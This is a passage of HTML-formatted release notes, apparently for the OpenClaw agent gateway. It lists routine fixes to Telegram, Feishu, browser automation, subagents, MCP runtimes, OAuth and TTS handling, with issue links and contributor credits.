data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59968/hovercard" href="https://github.com/openclaw/openclaw/issues/59968">#59968</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233361564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63813/hovercard" href="https://github.com/openclaw/openclaw/issues/63813">#63813</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120171658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52804/hovercard" href="https://github.com/openclaw/openclaw/issues/52804">#52804</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057886163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43163" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43163/hovercard" href="https://github.com/openclaw/openclaw/issues/43163">#43163</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327695420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71509" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71509/hovercard" href="https://github.com/openclaw/openclaw/pull/71509">#71509</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/models: make <code>openclaw models scan</code> fall back to public OpenRouter free-model metadata when no <code>OPENROUTER_API_KEY</code> is configured, avoid config secret resolution for explicit <code>--no-probe</code> scans, and apply the scan timeout to the OpenRouter catalog request.</li>
<li>Feishu: keep streaming cards to one live card per turn, flush throttled card edits after meaningful text boundaries, and skip exact block/partial repeats so tool-heavy replies do not duplicate card output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allan0509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allan0509">@allan0509</a>.</li>
<li>Feishu: finish the streaming-card duplicate closeout by stripping leaked reasoning tags, preserving cross-block partial snapshots, enabling topic-thread streaming cards, omitting the generic <code>main</code> card header, surfacing transient tool/compaction status, and cleaning streaming state after close failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sesame437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sesame437">@sesame437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vicky-v7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vicky-v7">@Vicky-v7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoku-family/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoku-family">@maoku-family</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pengxiao-Wang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pengxiao-Wang">@Pengxiao-Wang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Maple778/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Maple778">@Maple778</a>.</li>
<li>Telegram: recover incomplete partial-stream previews by falling back to a final send when an ambiguous final edit failure would otherwise retain a strict prefix of the answer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327777647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71525/hovercard" href="https://github.com/openclaw/openclaw/issues/71525">#71525</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327970972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71554/hovercard" href="https://github.com/openclaw/openclaw/pull/71554">#71554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Control UI/chat: collapse assistant token/model context details behind an explicit Context disclosure and show full dates in message footers, making historical transcript timing clear without noisy default metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326580782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71337/hovercard" href="https://github.com/openclaw/openclaw/pull/71337">#71337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>OpenAI/Codex OAuth: explain <code>unsupported_country_region_territory</code> token-exchange failures with a proxy/region hint instead of surfacing a generic OAuth error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109246729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51175/hovercard" href="https://github.com/openclaw/openclaw/issues/51175">#51175</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327668763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71501/hovercard" href="https://github.com/openclaw/openclaw/pull/71501">#71501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wulala-xjj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wulala-xjj">@wulala-xjj</a>.</li>
<li>Browser/Linux: fall back to headless mode for local managed profiles on hosts without a display server, while preserving explicit per-profile headed overrides and reporting the headless source. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205308957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60953/hovercard" href="https://github.com/openclaw/openclaw/pull/60953">#60953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rrpsantos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rrpsantos">@rrpsantos</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Telegram: keep the polling stall watchdog active even when grammY reports the runner as not running while its task is still pending, so a rebuilt transport cannot leave <code>getUpdates</code> silent until a manual gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291652137" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69064/hovercard" href="https://github.com/openclaw/openclaw/issues/69064">#69064</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LDLoeb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LDLoeb">@LDLoeb</a>.</li>
<li>Subagents: fall back to direct completion delivery when the parent announce turn finishes without a visible payload, so child results still reach channel-backed requester sessions.</li>
<li>Subagents: tell parent agents to use <code>sessions_yield</code> while waiting for child completion events, preventing GPT-5 fast runs from ending silently after spawning workers.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/CLI: lazy-load browser command groups and plugin runtime services so <code>openclaw browser --help</code> can render without loading the full browser automation stack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248388921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65400/hovercard" href="https://github.com/openclaw/openclaw/issues/65400">#65400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248899051" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65460/hovercard" href="https://github.com/openclaw/openclaw/pull/65460">#65460</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263144074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66640" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66640/hovercard" href="https://github.com/openclaw/openclaw/pull/66640">#66640</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pandego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pandego">@pandego</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianworld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianworld">@Tianworld</a>.</li>
<li>Browser/CLI: serve precomputed <code>openclaw browser --help</code> text from CLI startup metadata, avoiding the full plugin/config startup path for the common help invocation.</li>
<li>Browser/downloads: seed managed Chrome profiles with OpenClaw download prefs and capture unmanaged click-triggered downloads under the guarded downloads directory, while explicit download waiters still own their target file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242367248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64558/hovercard" href="https://github.com/openclaw/openclaw/pull/64558">#64558</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pearcekieser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pearcekieser">@Pearcekieser</a>.</li>
<li>Browser/Chrome: stop passing redundant <code>--disable-setuid-sandbox</code> when <code>browser.noSandbox</code> is enabled; <code>--no-sandbox</code> remains the effective sandbox opt-out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279830525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67939/hovercard" href="https://github.com/openclaw/openclaw/pull/67939">#67939</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebykrueger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebykrueger">@sebykrueger</a>.</li>
<li>Browser/client: stop telling agents to permanently avoid the browser after transient timeout or cancellation failures; keep the no-retry hint for persistent unavailable/rate-limit cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076448290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46505/hovercard" href="https://github.com/openclaw/openclaw/pull/46505">#46505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jriff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jriff">@jriff</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Co-Messi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Co-Messi">@Co-Messi</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level <code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartoviMD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartoviMD">@spartoviMD</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>GitHub Copilot: never rewrite connection-bound reasoning item IDs regardless of whether <code>encrypted_content</code> is present, fixing a 400 "Encrypted content item_id did not match" error with <code>gpt-5.3-codex</code> and future Codex models that fall through to the forward-compat catch-all with <code>reasoning: false</code>. Also recognize Codex-named models as reasoning-capable so they inherit the correct capability flags. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289536760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68735/hovercard" href="https://github.com/openclaw/openclaw/issues/68735">#68735</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InvalidPandaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InvalidPandaa">@InvalidPandaa</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ycjlb2023-peteryi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ycjlb2023-peteryi">@ycjlb2023-peteryi</a>.</li>
<li>WhatsApp/TTS: transcode MP3/WebM audio, including Microsoft Edge TTS output, to Ogg/Opus before sending PTT voice notes.</li>
<li>QQBot/TTS: honor plain <code>audioAsVoice</code> replies by synthesizing TTS to native QQ voice messages, and mark inbound voice-only messages as audio media without exposing raw voice paths to generic media context.</li>
<li>Providers/SenseAudio: add bundled SenseAudio batch audio transcription through <code>tools.media.audio</code> with <code>SENSEAUDIO_API_KEY</code> auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265936553" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66943/hovercard" href="https://github.com/openclaw/openclaw/pull/66943">#66943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fl0rencess720/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fl0rencess720">@Fl0rencess720</a>.</li>
<li>Providers/MiniMax: let TTS use MiniMax portal OAuth and Token Plan credentials before falling back to <code>MINIMAX_API_KEY</code>, and include current TTS HD model ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141517456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55017/hovercard" href="https://github.com/openclaw/openclaw/issues/55017">#55017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zx15210404690-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zx15210404690-hash">@zx15210404690-hash</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xieyuanqing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xieyuanqing">@xieyuanqing</a>.</li>
<li>Active Memory: keep silent recall sub-agent billing/auth failures out of shared auth-profile cooldown state, so a Claude CLI extra-usage rejection cannot disable normal Claude-backed turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325943036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71284/hovercard" href="https://github.com/openclaw/openclaw/issues/71284">#71284</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327867252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71539" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71539/hovercard" href="https://github.com/openclaw/openclaw/pull/71539">#71539</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auth/Claude CLI: sync refreshed Claude CLI OAuth credentials into the managed auth profile so long-running Claude CLI runs stop falling back to stale OpenClaw snapshots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320240541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70902" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70902/hovercard" href="https://github.com/openclaw/openclaw/pull/70902">#70902</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starvex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starvex">@starvex</a>.</li>
<li>Sessions: make <code>sessions_spawn(mode="session")</code> errors name usable alternatives when the current channel cannot bind subagent threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271801625" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67400/hovercard" href="https://github.com/openclaw/openclaw/issues/67400">#67400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277983433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67790/hovercard" href="https://github.com/openclaw/openclaw/pull/67790">#67790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/Claude CLI: pass the OpenClaw system prompt through Claude's prompt-file flag so Windows runs avoid argv length failures without changing system prompt semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292748556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69158" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69158/hovercard" href="https://github.com/openclaw/openclaw/issues/69158">#69158</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293340040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69211/hovercard" href="https://github.com/openclaw/openclaw/pull/69211">#69211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylee-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylee-01">@skylee-01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassioanorte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassioanorte">@cassioanorte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Syu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Syu0">@Syu0</a>, and @Stache73.</li>
